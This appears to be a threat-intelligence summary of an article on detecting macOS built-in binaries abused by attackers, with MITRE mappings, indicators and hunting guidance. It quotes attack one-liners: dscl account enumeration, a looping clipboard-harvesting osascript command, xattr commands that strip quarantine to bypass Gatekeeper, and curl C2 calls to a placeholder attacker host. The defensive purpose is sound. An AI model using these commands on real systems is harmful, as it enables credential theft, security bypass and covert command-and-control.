Keypoints
- LOOBins are built-in macOS binaries that attackers leverage across the attack chain to evade detection and perform discovery, collection, defense evasion, and C2.
- dscl is used for account and AD/environment enumeration with commands like “dscl . -list /Users” and “dscl ‘/Active Directory/…/All Domains’ -read /Users/$USERNAME”.
- osascript and pbpaste can be run in loops to capture clipboard contents to files (e.g., clipdata.txt, loot.txt), enabling credential harvesting.
- xattr -d com.apple.quarantine (and recursive variants) is used to remove quarantine attributes and bypass Gatekeeper/notarization checks, observed in OceanLotus and WindTail activity.
- Villain-based payloads use native tools (nohup, curl, pkill, sleep, echo) with repeated curl calls and an Authorization header for bidirectional C2 communication.
- Detections should rely on detailed process/command-line logging from EDR or osquery; the article supplies Spotter queries to hunt for dscl, osascript/pbpaste, xattr, curl, launchctl, and defaults abuse.
MITRE Techniques
- [T1087] Account Discovery – dscl is used to enumerate accounts and directory data ( ‘dscl . -list /Users’ )
- [T1087.001] Account Discovery: Local Account – dscl commands enumerate local user and group details ( ‘dscl . -read /Users/$USERNAME’ )
- [T1087.002] Account Discovery: Domain Account – dscl targets Active Directory paths to list/read domain users/groups ( ‘dscl “/Active Directory/TEST/All Domains” -list /Users’ )
- [T1135] Network Share Discovery – dscl and related commands can list network share points ( ‘dscl . -list /SharePoints’ )
- [T1201] Password Policy Discovery – dscl reads configuration shadowhash to reveal password policy info ( ‘dscl . -read /Config/shadowhash’ )
- [T1115] Clipboard Data – osascript and pbpaste are used to read clipboard contents and append them to files in a loop ( ‘while true; do echo $(osascript -e ‘return (the clipboard)’) >> clipdata.txt; sleep 10; done’ )
- [T1553] Subvert Trust Controls – xattr is used to modify file attributes to bypass trust controls and notarization checks ( ‘xattr -d com.apple.quarantine FILE’ )
- [T1553.001] Subvert Trust Controls: Gatekeeper Bypass – recursive removal of com.apple.quarantine is used to skip Gatekeeper ( ‘xattr -d -r com.apple.quarantine *’ )
- [T1102] Web Service – curl is repeatedly used to contact attacker-controlled web services for C2 communication ( ‘curl -s http://[attackerip]:[attackerport]/[clientid] -H “Authorization: [authtoken]”‘ )
- [T1102.002] Web Service: Bidirectional Communication – Villain payloads poll and post commands/results via curl with Authorization header for bidirectional C2 ( ‘curl -s “$p$s/c5f960d6/$hname/$USER” -H “Authorization: $i” -o /dev/null’ )
Indicators of Compromise
- [File names] Clipboard exfiltration artifacts – clipdata.txt, loot.txt
- [Command/HTTP pattern] Repeated curl C2 calls – curl -s http://[attackerip]:[attackerport]/[clientid] -H “Authorization: [authtoken]” (used frequently by Villain), and dozens of similar curl invocations
- [File attribute] Gatekeeper/quarantine marker – com.apple.quarantine (examples: xattr -d com.apple.quarantine FILE, xattr -d -r com.apple.quarantine *)
- [Binaries/process names] LOOBin binaries used as living-off-the-orchard indicators – dscl, osascript, pbpaste, xattr, nohup, curl (observed in process chains)
dscl, osascript/pbpaste, xattr, and curl are the primary LOOBins illustrated, along with examples and detection logic. For discovery, dscl commands enumerate local and Active Directory accounts (e.g., “dscl . -list /Users”, “dscl ‘/Active Directory/…/All Domains’ -read /Users/$USERNAME”), which should be flagged when seen originating from non-admin contexts or paired with listing/read flags. For collection, clipboard harvesting uses osascript or pbpaste in loops to write plaintext clipboard contents to files (e.g., “while true; do echo $(osascript -e ‘return (the clipboard)’) >> clipdata.txt; sleep 10; done”), so detections should look for osascript/pbpaste with ‘-e’, ‘return’, ‘(the clipboard)’, or repeated file append operations.
For defense evasion, xattr is used to strip the quarantine attribute and bypass Gatekeeper (examples: “xattr -d com.apple.quarantine FILE”, “xattr -d -r com.apple.quarantine *”); watch for xattr invocations targeting com.apple.quarantine with -d or -r flags. Villain-style C2 leverages nohup and frequent curl calls with specific flags and headers (e.g., “curl -s http://[attackerip]:[attackerport]/[clientid] -H ‘Authorization: [authtoken]’”)—detection can focus on repeated curl invocations containing ‘-s’ and an Authorization header or abnormal outbound web service requests from endpoints.
Operational detection guidance: ingest detailed process and command-line telemetry via modern EDR or osquery, then apply search rules that match dscl list/read patterns, osascript/pbpaste clipboard access and looping writes, xattr -d/-r against com.apple.quarantine, and curl commands with ‘-s’ plus ‘-H “Authorization:”‘. The article includes Spotter queries for these behaviors and recommends prioritizing EDR/osquery telemetry to reliably surface LOOBin abuse across macOS fleets.
Read more: https://www.securonix.com/blog/detecting-macos-loobins-attack-activity-using-security-analytics/